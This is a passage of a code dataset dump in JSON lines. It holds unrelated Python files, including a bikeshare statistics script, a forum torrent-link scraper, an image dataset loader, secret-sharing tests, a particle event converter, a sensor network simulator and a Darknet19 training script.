apply no month filter\n day - name of the day of week to filter by, or \"all\" to apply no day filter\n All inputs are string formatted\n \"\"\"\n Welcome_msg = \"Hello! My name is Python.Js and i\\'m delighted to be your acquaintance to walk through some US bikeshare data with you!.\"\n print(Welcome_msg)\n print()\n # get user input for city (chicago, new york city, washington). HINT: Use a while loop to handle invalid inputs\n available_data = 'Now, Bikeshare Data is only available for New York, Chicago And Washington. Enter city here: '\n city = input().lower(available_data)\n while city not in CITY_DATA:\n city = input('Invalid city name. Try Again?: ').lower()\n\n print()\n # get user input for month (all, january, february, ... , june)\n Investigate_months = 'Again, Bikeshare Data is only available from January to June. \\nSelect the month you want to explore or enter \"all\" \\nto explore all the months simultaneously here: '\n month = input(Investigate_months)\n MONTHS = ['all', 'january', 'february', 'march', 'april', 'may', 'june']\n while month not in MONTHS:\n month = input('Invalid month name entered. Try Again?: ').title()\n\n print()\n # get user input for day of week (all, monday, tuesday, ... sunday)\n day = input('Enter a specific day of the week or \\nenter \"all\" to explore all days of the week simultaneously: ').lower()\n DAYS = ['all', 'sunday', 'monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday' ]\n while day not in DAYS:\n day = input('Invalid day name! Try Again?: ').lower()\n\n print('-'*40)\n return city, month, day\n\n\ndef load_data(city, month, day):\n \"\"\"\n Loads data for the specified city and filters by month and day if applicable.\n\n Args:\n city - name of the city to analyze\n month - name of the month to filter by, or \"all\" to apply no month filter\n day - name of the day of week to filter by, or \"all\" to apply no day filter\n Returns:\n df - Pandas DataFrame containing city data filtered by month and day\n All inputs are string formatted\n \"\"\"\n # load data file into a dataframe\n df = pd.read_csv(CITY_DATA[city])\n\n # convert the Start Time column to datetime\n df['Start Time'] = pd.to_datetime(df['Start Time'])\n\n # create month column\n df['month'] = df['Start Time'].dt.month\n\n #create weekdays column\n df['day_of_the_week'] = df['Start Time'].dt.weekday_name\n\n #create Time column\n df['Hour'] = df['Start Time'].dt.hour\n\n\n #create a dataframe filtered with only a specified month\n if month != 'all':\n # use the index of the months list to get the corresponding int\n MONTHS = ['january', 'february', 'march', 'april', 'may', 'june']\n month = MONTHS.index(month) + 1\n df = df[df['month'] == month]\n\n # filter by day of week if applicable\n if day != 'all':\n # filter by day of week to create the new dataframe\n df = df[df['day_of_the_week'] == day.title()]\n\n return df\n\n\ndef time_stats(df):\n \"\"\"Displays statistics on the most frequent times of travel.\"\"\"\n\n print('\\nCalculating The Most Frequent Times of Travel...\\n')\n start_time = time.time()\n\n # convert the Start Time column to datetime\n df['Start Time'] = pd.to_datetime(df['Start Time'])\n\n # create a month column\n df['month'] = df['Start Time'].dt.month\n\n # display the most common month\n MONTHS = ['All', 'January', 'February', 'March', 'April', 'May', 'June']\n Most_common_month = df['month'].value_counts().idxmax()\n print(f'Most common month for Travelling is {Most_common_month}.')\n\n #create weekdays column\n df['day_of_the_week'] = df['Start Time'].dt.weekday_name\n\n # display the most common day of week\n DAYS = ['sunday', 'monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday' ]\n Most_common_day_of_the_week = df['day_of_the_week'].mode()[0]\n print(f'The most common day of the week for Travelling is {Most_common_day_of_the_week}.')\n\n\n #create Time column\n df['Hour'] = df['Start Time'].dt.hour\n\n # display the most common start hour\n Most_preferred_hour = df['Hour'].mode()[0]\n print(f'The most preferred time for traveling is {Most_preferred_hour}.')\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef station_stats(df):\n \"\"\"Displays statistics on the most popular stations and trip.\"\"\"\n\n print('\\nCalculating The Most Popular Stations and Trip...\\n')\n start_time = time.time()\n\n # Get to know the most commonly used start station\n Most_preferred_start_station = df['Start Station'].value_counts().idxmax()\n print('The most preferred Start Station is: ', Most_preferred_start_station)\n\n # Get to know the most commonly used end station\n Most_preferred_end_station = df['End Station'].value_counts().idxmax()\n print('The most preferred End Station is: ', Most_preferred_end_station)\n\n\n # Get to know most frequent combination of start station and end station trip\n Most_preferred_Start_End_Trip = df[['Start Station', 'End Station']].mode().loc[0]\n print('The most preferred Start-End Trip is from {} to {}.'.format(Most_preferred_Start_End_Trip[0], Most_preferred_Start_End_Trip[1]))\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef trip_duration_stats(df):\n \"\"\"Displays statistics on the total and average trip duration.\"\"\"\n\n print('\\nCalculating Trip Duration...\\n')\n start_time = time.time()\n\n # display total travel time\n Total_time_travel = df['Trip Duration'].sum()\n print('Total time travel is {} seconds.'.format(Total_time_travel))\n\n\n # display mean travel time\n Mean_travel_time = df['Trip Duration'].mean()\n print('Average Total Trip duration is {} seconds.'.format(Mean_travel_time))\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef user_stats(df):\n \"\"\"Displays statistics on bikeshare users.\"\"\"\n\n print('\\nCalculating User Stats...\\n')\n start_time = time.time()\n\n # Display counts of user types\n User_Types = df['User Type'].value_counts()\n print('categories of users: ''\\n', User_Types)\n\n # Display counts of gender\n if 'Gender' in df.columns:\n gender_counts = df['Gender'].value_counts()\n print('Total gender counts = \\n', gender_counts)\n\n # Display earliest, most recent, and most common year of birth\n if 'Birth Year' in df.columns:\n Earliest_birth_year = df['Birth Year'].min()\n Recent_birth_year = df['Birth Year'].max()\n common_birth_year = df['Birth Year'].mode()[0]\n print('Earliest birth year is {}, Recent birth year {} and common birth year is {}.'.format(Earliest_birth_year, Recent_birth_year, common_birth_year))\n\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef main():\n while True:\n city, month, day = get_filters()\n df = load_data(city, month, day)\n\n time_stats(df)\n station_stats(df)\n trip_duration_stats(df)\n user_stats(df)\n\n restart = input('\\nWould you like to restart? Enter yes or no.\\n')\n if restart.lower() != 'yes':\n break\n\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"bikeshare_2.py","file_name":"bikeshare_2.py","file_ext":"py","file_size_in_byte":7685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"539286552","text":"from urllib import request\nfrom bs4 import BeautifulSoup\n\n\"\"\"\n 获取btbtt的种子\n\"\"\"\n#http://www.btbtt.us/forum-index-fid-951-page-1.htm\nurl = 'http://www.btbtt.us/forum-index-fid-951-page-'\nthread_prefix_url = 'http://www.btbtt.us/'\nheader = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'}\ni = 1\ntemp_url = url+str(i)+'.htm'\nreq = request.Request(temp_url,headers=header)\nrep = request.urlopen(req)\nthread_list_html = rep.read().decode('utf-8')\nsoup = BeautifulSoup(thread_list_html, 'html.parser')\ntables = BeautifulSoup.find_all(soup, name='a', attrs={'class':'subject_link thread-new'})\nit = iter(tables)\n#循环遍历每个帖子,获取附件名称和地址\nfor x in it:\n thread_url = x.attrs['href']\n req = request.Request(thread_prefix_url+thread_url,headers=header)\n thread_html = request.urlopen(req).read().decode('utf-8')\n soup = BeautifulSoup(thread_html,'html.parser')\n div = soup.find_all(name='div',attrs={'class':'attachlist'})\n attach = div[0].contents[1].contents[5].contents[1].contents[1]\n attach_href = attach.attrs['href']\n attach_href = attach_href.replace('dialog','download')\n attach_name = attach.text\n print(\"attach_name =\",attach_name,',attach_href =',attach_href)\n\n#http://www.btbtt.us/attach-download-fid-951-aid-4741003.htm\n\n","sub_path":"bt_demo.py","file_name":"bt_demo.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"453973639","text":"import os\nimport os.path as osp\nfrom torchvision.datasets import VisionDataset\nfrom PIL import Image\n\n\nclass RESISC45(VisionDataset):\n '''\n http://www.escience.cn/people/JunweiHan/NWPU-RESISC45.html\n '''\n\n root = '/data/public/rw/datasets/aerial_inspection/NWPU-RESISC45'\n\n def __init__(self, transforms=None, transform=None, target_transform=None):\n super().__init__(root=self.root, transforms=transforms,\n transform=transform, target_transform=target_transform)\n\n self.classes = sorted(os.listdir(self.root))\n self._files = list()\n self.labels = list()\n\n for cls_nm in self.classes:\n class_img_root = osp.join(self.root, cls_nm)\n cls_files = sorted([osp.join(class_img_root, img)\n for img in os.listdir(class_img_root)\n if img.endswith('jpg')])\n self._files += cls_files\n self.labels += [self.classes.index(cls_nm)] * len(cls_files)\n\n def __len__(self):\n return len(self._files)\n\n def __getitem__(self, i):\n imfile = self._files[i]\n image = Image.open(imfile).convert('RGB')\n target = self.labels[i]\n\n if self.transforms is not None:\n image, target = self.transforms(image, target)\n return image, target\n","sub_path":"submodules/datasets/datasets/aerial/aerial_classification.py","file_name":"aerial_classification.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"118241865","text":"# several functions interfacing with a settings file:\n# - read_settings: read from the settings file into a dictionary\n# - write_settings: write from a dictionary into the settings file (not made yet)\n\n# settings file uses the format:\n# - \"#\" at the start of a line disregards that line (for comments)\n# - blank lines are disregarded\n# - whitespace around \"=\" is disregarded\n# - variable names should be capitalized, but will be in the settings dictionary\n\n# example settings:\n# # EXAMPLE SETTINGS FILE\n# \n# SOME_VARIABLE = \"GitHub\"\n# ANOTHER_VARIABLE = True\n# YET_ANOTHER_VARIABLE = 1234 \n\n# settings dictionary uses the format:\n# - key is a capitalized string (\"SOME_VARIABLE\")\n# - value is also a string (\"GitHub\", \"True\", \"1234\")\n# - use int() or other such functions to convert from strings\n\n\n# read_settings() reads the settings file and returns the settings dictionary\ndef read_settings():\n settings = {}\n with open(\"./settings\", \"r\") as settings_file:\n lines = settings_file.readlines()\n for line in lines:\n if line[0] == \"#\": # disregard # (comments)\n continue\n if line == \"\\n\" or line == \"\": # disregard blank lines\n continue\n\n first_equal_sign = line.find(\"=\") # values may have equal signs!\n variable_name = line[0:first_equal_sign]\n # accounts for spacing to the left of the \"=\" in the settings file\n # (but not if the variable is a space for some reason)\n if variable_name[-1] == \" \" and variable_name != \" \":\n variable_name = variable_name[:-1] # removes the last digit from the string\n variable_name = variable_name.upper()\n \n # accounts for spacing to the right of the \"=\" in the settings file\n # (but not if the value is a space for some reason)\n value = line[first_equal_sign+1:]\n # removes the newline character from the value if it exists\n if value[-1] == \"\\n\":\n value = value[:-1]\n if value[0] == \" \" and value != \" \":\n value = value[1:] # removes the last digit from the string\n value = value\n \n settings[variable_name] = value\n \n return settings\n\n# write_settings() takes a settings dictionary and writes it to the settings file \ndef write_settings(settings):\n # not yet implemented\n return\n \n","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"651517744","text":"import pytest\nfrom random import randint\n\nfrom src.circuits.share import Share\n\n\n@pytest.mark.parametrize(\n \"share,const,mod,expected\",\n [(2,2,13,4),(1,2,11,3),(14,15,43,29),\n (21,6,23,4),(100,200,5,0),(14,-6,43,8),\n (51,-53,11003,11001)]\n)\ndef test_const_add(share,const,mod,expected):\n a = randint(0,mod-1)\n b = randint(0,mod-1)\n c = (-(a+b)) % mod\n\n share1 = Share(a, c - share, mod=mod, fp_prec=0)\n share2 = Share(b, a - share, mod=mod, fp_prec=0)\n\n share1_add = share1.const_add(const)\n share2_add = share2.const_add(const)\n\n assert expected == (share1_add.unshare(share2_add) % mod)\n\n@pytest.mark.parametrize(\n \"share,const,mod,fpp,expected\",\n [(2,2,11003,2,4),(1,2,11003,1,3),(14,15,43,0,29),\n (21,6,23,0,4),(100,200,5,0,0),(14,-6,43,0,8),\n (51,-53,11003,1,11001)]\n)\ndef test_const_add_scale(share,const,mod,fpp,expected):\n scale = 10**fpp\n share = share * scale\n\n a = randint(0,mod-1)\n b = randint(0,mod-1)\n c = (-(a+b)) % mod\n\n share1 = Share(a, c - share, mod=mod, fp_prec=fpp)\n share2 = Share(b, a - share, mod=mod, fp_prec=fpp)\n\n share1_add = share1.const_add(const,scaled=False)\n share2_add = share2.const_add(const,scaled=False)\n\n assert expected * scale == (share1_add.unshare(share2_add) % mod)\n\n@pytest.mark.parametrize(\n \"share,const,mod,expected\",\n [(2,2,13,4),(1,2,11,2),(3,3,17,9),(14,2,5,3)]\n)\ndef test_const_mult(share,const,mod,expected):\n\n a = randint(0,mod-1)\n b = randint(0,mod-1)\n c = (-(a+b)) % mod\n\n share1 = Share(a, c - share, mod=mod, fp_prec=0)\n share2 = Share(b, a - share, mod=mod, fp_prec=0)\n\n share1_mult = share1.const_mult(const)\n share2_mult = share2.const_mult(const)\n\n assert expected == (share1_mult.unshare(share2_mult) % mod)\n\n@pytest.mark.parametrize(\n \"share,old_prec,new_prec,mod,expected\",\n [(20,1,0,43,2),(300,2,1,1009,30),(1400,2,1,11003,140),(20,1,3,11003,2000)]\n)\ndef test_switch_precision(share,old_prec,new_prec,mod,expected):\n a = randint(0,mod-1)\n b = randint(0,mod-1)\n c = (-(a+b)) % mod\n\n share1 = Share(a, c - share, mod=mod, fp_prec=old_prec)\n share2 = Share(b, a - share, mod=mod, fp_prec=old_prec)\n\n share1_new = share1.switch_precision(new_prec)\n share2_new = share2.switch_precision(new_prec)\n\n assert expected == (share1_new.unshare(share2_new) % mod)\n\n@pytest.mark.parametrize(\n \"share1,share2,mod,fpp,expected\",\n [((1,1),(1,1),11,0,True),((1,2),(12,13),11,0,True),((1,5),(1,4),11,0,False)]\n)\ndef test_eq(share1,share2,mod,fpp,expected):\n shr1 = Share(share1[0],share1[1],mod=mod,fp_prec=fpp)\n shr2 = Share(share2[0],share2[1],mod=mod,fp_prec=fpp)\n\n assert (shr1 == shr2) == expected","sub_path":"tests/src/circuits/test_share.py","file_name":"test_share.py","file_ext":"py","file_size_in_byte":2704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"340949175","text":"from src.utils.tk import TKUtils\n\nfrom src.view.student.actions import Actions\nfrom src.view.student.list import StudentList\n\n\nclass Student(TKUtils.Container()):\n\n def __init__(self, master, controller, commands):\n super().__init__(master=master)\n self.pack(side='bottom')\n\n self.commands = commands\n self.__controller = controller\n\n self.actions = None\n self.student_list = None\n\n self._create_student_list()\n self._create_actions()\n\n def _create_student_list(self):\n commands = {}\n\n commands['raffle'] = self.commands['raffle']\n\n if not self.student_list:\n self.student_list = StudentList(master=self, commands=commands)\n\n def _create_actions(self):\n commands = {}\n\n commands['raffle'] = self.commands['raffle']\n commands['browse_file'] = self.__controller.browse_file_button\n\n self.actions = Actions(master=self, commands=commands)\n","sub_path":"src/view/student/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"164585479","text":"#!/usr/bin/python\nimport argparse\nfrom math import sqrt\n\ndef main():\n parser = argparse.ArgumentParser(description='Convert a HepEVT file from SuperCHIC.')\n parser.add_argument('input', help='input HepEVT file')\n parser.add_argument('--output', help='output event file', type=str)\n parser.add_argument('--xsect', help='process cross section', type=float)\n parser.add_argument('--xsect_err', help='error on the process cross section', type=float)\n args = parser.parse_args()\n\n output_file = args.output\n if not args.output:\n output_file = args.input.replace('.hepevt', '.evt')\n xsect = args.xsect\n if not args.xsect:\n xsect = 0.0\n xsect_err = args.xsect_err\n if not args.xsect_err:\n xsect_err = 0.0\n\n out = open(output_file, 'w')\n\n block = ''\n in_init = False\n in_event = False\n ini_info = {}\n for l in open(args.input):\n if '' in l:\n in_event = True\n block += l\n elif '' in l:\n in_event = False\n block += l\n block = convert_event_block(block, ini_info)\n out.write(block)\n block = ''\n elif in_init:\n l = l.split()\n if len(l)>4: #incoming particles' block\n in1_pdg, in2_pdg, in1_pz, in2_pz = l[0:4]\n ini_info = {'in1_pdg': in1_pdg, 'in1_pz': in1_pz,\n 'in2_pdg': in2_pdg, 'in2_pz': in2_pz}\n elif (xsect>0. or xsect_err>0.) and len(l)==4: #xsection/QCD/QED constants\n l[0] = '%.9E' % (xsect)\n l[1] = '%.9E' % (xsect_err)\n out.write('\\t'.join(l)+'\\n')\n elif in_event:\n block += l\n else:\n out.write(l)\n\n if '' in l:\n in_init = True\n elif '' in l:\n in_init = False\n\n\ndef convert_event_block(block, ini_info):\n out = ''\n npart = 0\n for l in block.split('\\n'):\n l = l.split()\n if len(l)==0: continue\n if len(l)>1 and len(l)<10: #in header\n l[0] = str(int(l[0])+2)\n out += ' '.join(l)+'\\n'\n part_mass = '0.000000000E+00'\n if int(ini_info['in1_pdg'])==2212: part1_mass = '0.938272046E+00'\n if int(ini_info['in2_pdg'])==2212: part2_mass = '0.938272046E+00'\n part1_ene = sqrt(float(ini_info['in1_pz'])**2+float(part1_mass)**2)\n part2_ene = sqrt(float(ini_info['in2_pz'])**2+float(part2_mass)**2)\n out += '\\t'.join([\n ini_info['in1_pdg'], '-1', '0', '0', '0', '0',\n '0.000000000E+00', '0.000000000E+00', ini_info['in1_pz'],\n '%.9E' % (part1_ene), part1_mass,\n '0.', '9.'])+'\\n'\n out += '\\t'.join([\n ini_info['in2_pdg'], '-1', '0', '0', '0', '0',\n '0.000000000E+00', '0.000000000E+00', '-'+ini_info['in2_pz'],\n '%.9E' % (part2_ene), part2_mass,\n '0.', '9.'])+'\\n'\n elif len(l)>2:\n if npart==0: #first outgoing proton\n l[2] = '1'\n elif npart==1: #second outgoing proton\n l[2] = '2'\n else:\n l[2] = str(int(l[2])+2)\n out += '\\t'.join(l)+'\\n'\n npart += 1\n else:\n out += '\\t'.join(l)+'\\n'\n return out\n\nif __name__=='__main__':\n main()\n","sub_path":"utils/superchic_converter_hepevt.py","file_name":"superchic_converter_hepevt.py","file_ext":"py","file_size_in_byte":3432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"615669595","text":"import csv\n\nfrom scipy.spatial import distance\n\nimport Simulator.parameter as para\nfrom network_method import uniform_com_func, to_string, count_package_function, network_partition\n\n\nclass Network:\n def __init__(self, list_node=None, mc_list=None, target=None, package_size=400, nb_charging_pos=81):\n self.node = list_node\n self.set_neighbor()\n self.set_level()\n self.mc_list = mc_list\n self.target = target\n self.charging_pos = []\n self.package_size = package_size\n self.nb_charging_pos = nb_charging_pos\n self.active = False\n self.package_lost = False\n\n def set_neighbor(self):\n for node in self.node:\n for other in self.node:\n if other.id != node.id and distance.euclidean(node.location, other.location) <= node.com_ran:\n node.neighbor.append(other.id)\n\n def set_level(self):\n queue = []\n for node in self.node:\n if distance.euclidean(node.location, para.base) < node.com_ran:\n node.level = 1\n queue.append(node.id)\n while queue:\n for neighbor_id in self.node[queue[0]].neighbor:\n if not self.node[neighbor_id].level:\n self.node[neighbor_id].level = self.node[queue[0]].level + 1\n queue.append(neighbor_id)\n queue.pop(0)\n\n def partition(self, func=network_partition):\n self.charging_pos = func(self)\n for mc in self.mc_list:\n mc.optimizer.update_charging_pos(self.charging_pos)\n self.active = True\n\n def communicate(self, func=uniform_com_func):\n return func(self)\n\n def run_per_second(self, t):\n state = self.communicate()\n request_id = []\n for index, node in enumerate(self.node):\n if node.energy < node.energy_thresh:\n for mc in self.mc_list:\n node.request(optimizer=mc.optimizer, t=t)\n request_id.append(index)\n else:\n node.is_request = False\n if request_id:\n for index, node in enumerate(self.node):\n if index not in request_id and (t - node.check_point[-1][\"time\"]) > 50:\n node.set_check_point(t)\n if self.active:\n for mc in self.mc_list:\n mc.run(network=self, time_stem=t, net=self)\n return state\n\n def simulate_max_time(self, max_time=2000000, file_name=\"log/information_log.csv\"):\n with open(file_name, \"w\") as information_log:\n writer = csv.DictWriter(information_log, fieldnames=[\"time\", \"nb_dead_node\", \"nb_package\"])\n writer.writeheader()\n nb_dead = 0\n nb_package = len(self.target)\n dead_time = 0\n t = 0\n while t <= max_time:\n t = t + 1\n if (t - 1) % 100 == 0:\n print(\"time = \", t, \", lowest energy node: \", self.node[self.find_min_node()].energy, \"at\",\n self.node[self.find_min_node()].location)\n print('\\tnumber of dead node: {}'.format(self.count_dead_node()))\n print('\\tnumber of package: {}'.format(self.count_package()))\n with open(file_name, 'a') as information_log:\n node_writer = csv.DictWriter(information_log, fieldnames=[\"time\", \"nb_dead_node\", \"nb_package\"])\n node_writer.writerow(\n {\"time\": t, \"nb_dead_node\": self.count_dead_node(), \"nb_package\": self.count_package()})\n for mc in self.mc_list:\n print(\"\\tMC#{} at{} is {}\".format(mc.id, mc.current, mc.get_status()))\n\n ######################################\n if t == 200:\n self.partition()\n ######################################\n\n state = self.run_per_second(t)\n current_dead = self.count_dead_node()\n current_package = self.count_package()\n if not self.package_lost:\n if current_package < len(self.target):\n self.package_lost = True\n dead_time = t\n if current_dead != nb_dead or current_package != nb_package:\n nb_dead = current_dead\n nb_package = current_package\n with open(file_name, 'a') as information_log:\n node_writer = csv.DictWriter(information_log, fieldnames=[\"time\", \"nb_dead_node\", \"nb_package\"])\n node_writer.writerow({\"time\": t, \"nb_dead_node\": current_dead, \"nb_package\": current_package})\n\n print('\\nFinished with {} dead sensors, {} packages'.format(self.count_dead_node(), self.count_package()))\n return dead_time, nb_dead\n\n def simulate(self, max_time=2000000, file_name='log/log.csv'):\n if max_time:\n life_time = self.simulate_max_time(max_time=max_time, file_name=file_name)\n else:\n life_time = self.simulate_lifetime(file_name=file_name)\n return life_time\n\n def print_net(self, func=to_string):\n func(self)\n\n def find_min_node(self):\n min_energy = 10 ** 10\n min_id = -1\n for node in self.node:\n if node.energy < min_energy:\n min_energy = node.energy\n min_id = node.id\n return min_id\n\n def count_dead_node(self):\n count = 0\n for node in self.node:\n if node.energy <= 0:\n count += 1\n return count\n\n def count_package(self, count_func=count_package_function):\n count = count_func(self)\n return count\n\n ##############################################################################################\n def simulate_lifetime(self, file_name=\"log/energy_log.csv\"):\n energy_log = open(file_name, \"w\")\n node_log = open('log/dead_node.csv', 'w')\n writer = csv.DictWriter(energy_log, fieldnames=[\"time\", \"mc energy\", \"min energy\"])\n writer.writeheader()\n node_writer = csv.DictWriter(node_log, fieldnames=['time', 'dead_node'])\n node_writer.writeheader()\n node_log.close()\n t = 0\n while t <= 2000000:\n t = t + 1\n if (t - 1) % 100 == 0:\n node_log = open('log/dead_node.csv', 'a')\n node_writer = csv.DictWriter(node_log, fieldnames=['time', 'dead_node'])\n node_writer.writerow({\"time\": t, \"dead_node\": self.count_dead_node()})\n node_log.close()\n print('number of dead node: {}'.format(self.count_dead_node()))\n print(\"time = \", t, \", lowest energy node: \", self.node[self.find_min_node()].energy, \"at\",\n self.node[self.find_min_node()].location)\n for mc in self.mc_list:\n print(\"\\tMC#{} at{} is {}\".format(mc.id, mc.current, mc.get_status()))\n state = self.run_per_second(t)\n if not (t - 1) % 50:\n for mc in self.mc_list:\n writer.writerow(\n {\"time\": t, \"mc energy\": mc.energy, \"min energy\": self.node[self.find_min_node()].energy})\n\n print(t, self.node[self.find_min_node()].energy)\n for mc in self.mc_list:\n print(\"\\tMC#{} at{}\".format(mc.id, mc.current))\n writer.writerow({\"time\": t, \"mc energy\": mc.energy, \"min energy\": self.node[self.find_min_node()].energy})\n energy_log.close()\n return t\n","sub_path":"Simulator/Network/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":7479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"171730204","text":"from rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom rest_framework.status import HTTP_201_CREATED\nfrom rest_framework.exceptions import ValidationError\nfrom modules.Entities.Payment.Payment import Payment\nfrom modules.Domain.Services.PayPalService import PayPalService\nfrom modules.Application.PluginAdaptor.PayPal.PayPalPluginAdaptor import PayPalPluginAdaptor\n\n\n@api_view(['POST'])\ndef payment_create(request):\n if 'first_name' not in request.data.keys():\n raise ValidationError('First name is missing')\n if 'last_name' not in request.data.keys():\n raise ValidationError('Last name is missing')\n payment = Payment(request.data)\n adaptor = PayPalPluginAdaptor(request.data, payment)\n service = PayPalService(adaptor)\n service.pay()\n return Response(payment.to_string(), status=HTTP_201_CREATED)\n\n\n@api_view(['POST'])\ndef payment_capture(request):\n payment = Payment(request.data)\n adaptor = PayPalPluginAdaptor(request.data, payment)\n service = PayPalService(adaptor)\n service.update()\n return Response(payment.to_string(), status=HTTP_201_CREATED)\n\n\n@api_view(['POST'])\ndef payment_status(request):\n payment = Payment(request.data)\n adaptor = PayPalPluginAdaptor(request.data, payment)\n service = PayPalService(adaptor)\n service.status()\n return Response(payment.to_string(), status=HTTP_201_CREATED)\n","sub_path":"webapps/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"281410296","text":"from imports import *\r\n\r\ndef promo(request):\r\n if request.session.get('ismanagerloggedin', False):\r\n data['username']=request.session.get(\"username\")\r\n template = loader.get_template('manager_promo.html')\r\n context = {\r\n 'data': data\r\n }\r\n return HttpResponse(template.render(context, request))\r\n else:\r\n return HttpResponseRedirect(\"login\")","sub_path":"manager/views/promo.py","file_name":"promo.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"551077394","text":"\"\"\"\r\nИмя проекта: practicum-1\r\nНомер версии: 1.0\r\nИмя файла: 60.py\r\nАвтор: 2020 © Д.П. Юткина, Челябинск\r\nЛицензия использования: CC BY-NC 4.0 (https://creativecommons.org/licenses/by-nc/4.0/deed.ru)\r\nДата создания: 10/12/2020\r\nДата последней модификации: 10/12/2020\r\nОписание: Решение задачи 60 практикума № 1\r\n#версия Python: 3.8\r\n\"\"\"\r\n\r\n\"\"\"\r\nЗаданы M строк, которые вводятся с клавиатуры.\r\nКаждая строка представляет собой последовательность символов, включающих в себя\r\nвопросительные знаки. Заменить в каждой строке все имеющиеся в��просительные знаки\r\nзвёздочками.\r\n\"\"\"\r\nimport re\r\nM = int(input(\"Введите количество строк: \"))\r\nx = []\r\nfor i in range(0, M):\r\n print(\"Введите строку:\", end=' ')\r\n x.append(input())\r\nfor y in x:\r\n y = re.sub(r'\\?', '*', y)\r\n print(y)\r\n","sub_path":"60.py","file_name":"60.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"389008219","text":"import time\nimport cv2\nimport numpy as np\nimport chainer\nimport glob\nimport os\nimport renom as rm\nfrom renom.cuda.cuda import set_cuda_active, cuGetDeviceCount, cuDeviceSynchronize\nfrom renom import cuda\nfrom renom.utility.trainer import Trainer\nfrom renom.utility.distributor import NdarrayDistributor\nfrom darknet19 import *\nfrom lib.image_generator import *\n\nset_cuda_active(True)\n\n# hyper parameters\ninput_height, input_width = (448, 448)\nitem_path = \"./items\"\nbackground_path = \"./backgrounds\"\n# label_file = \"./data/label.txt\"\nbackup_path = \"./backup\"\nbatch_size = 8\nmax_batches = 3000\nlearning_rate = 0.05\nlr_decay_power = 4\nmomentum = 0.9\nweight_decay = 0.0005\nclasses = 10\nnum_gpu = cuGetDeviceCount()\n\n# load image generator\nprint(\"loading image generator...\")\ngenerator = ImageGenerator(item_path, background_path)\n\n# with open(label_file, \"r\") as f:\n# labels = f.read().strip().split(\"\\n\")\n\n# load model\nprint(\"loading model...\")\nmodel = Darknet19(classes)\nbackup_file = \"%s/backup.h5\" % (backup_path)\nif os.path.isfile(backup_file):\n model.load(backup_file)\n#cuda.get_device(0).use()\n#model.to_gpu() # for gpu\n\ntrainer = Trainer(model,\n batch_size=batch_size,\n loss_func=rm.mean_squared_error,\n num_epoch=1,\n optimizer=rm.Sgd(lr=learning_rate, momentum=momentum), num_gpu=num_gpu)\n\n\n# start to train\nprint(\"start training\")\nfor batch in range(max_batches):\n # generate sample\n x, t = generator.generate_samples(\n n_samples=batch_size,\n n_items=1,\n crop_width=input_width,\n crop_height=input_height,\n min_item_scale=0.1,\n max_item_scale=0.2,\n rand_angle=25,\n minimum_crop=0.8,\n delta_hue=0.01,\n delta_sat_scale=0.5,\n delta_val_scale=0.5\n )\n #x = rm.Variable(x)\n one_hot_t = []\n for i in range(len(t)):\n one_hot_t.append(t[i][0][\"one_hot_label\"])\n #x.to_gpu()\n one_hot_t = np.array(one_hot_t, dtype=np.float32)\n #one_hot_t = rm.Variable(one_hot_t)\n #one_hot_t.to_gpu()\n trainer.train(train_distributor=NdarrayDistributor(x, one_hot_t))\n # with model.train():\n # output = model(x)\n # loss = rm.softmax_cross_entropy(output, one_hot_t)\n\n #loss.to_cpu()\n\n # grad = loss.grad()\n # grad.update(opt)\n # print(\"[batch %d (%d images)] loss: %f\" % (batch+1, (batch+1) * batch_size, loss))\n\n trainer.optimizer = rm.Sgd(lr=learning_rate * (1 - batch / max_batches) ** lr_decay_power, momentum=momentum) # Polynomial decay learning rate\n\n # save model\n if (batch+1) % 1000 == 0:\n model_file = \"%s/%s.h5\" % (backup_path, batch+1)\n print(\"saving model to %s\" % (model_file))\n model.save(model_file)\n model.save(backup_file)\n\nprint(\"saving model to %s/darknet19_448_final.h5\" % (backup_path))\nmodel.save(\"%s/darknet19_448_final.h5\" % (backup_path))\n","sub_path":"darknet19_448_train.py","file_name":"darknet19_448_train.py","file_ext":"py","file_size_in_byte":2903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"275549876","text":"# All isentropic flow equations are defined in this module\n\nfrom math import sqrt\nimport pprint\n\n\ndef run_isentropic_funcs(study_blocks):\n ''' Is called by a flow study object. '''\n # sub_blocks = [block for block in 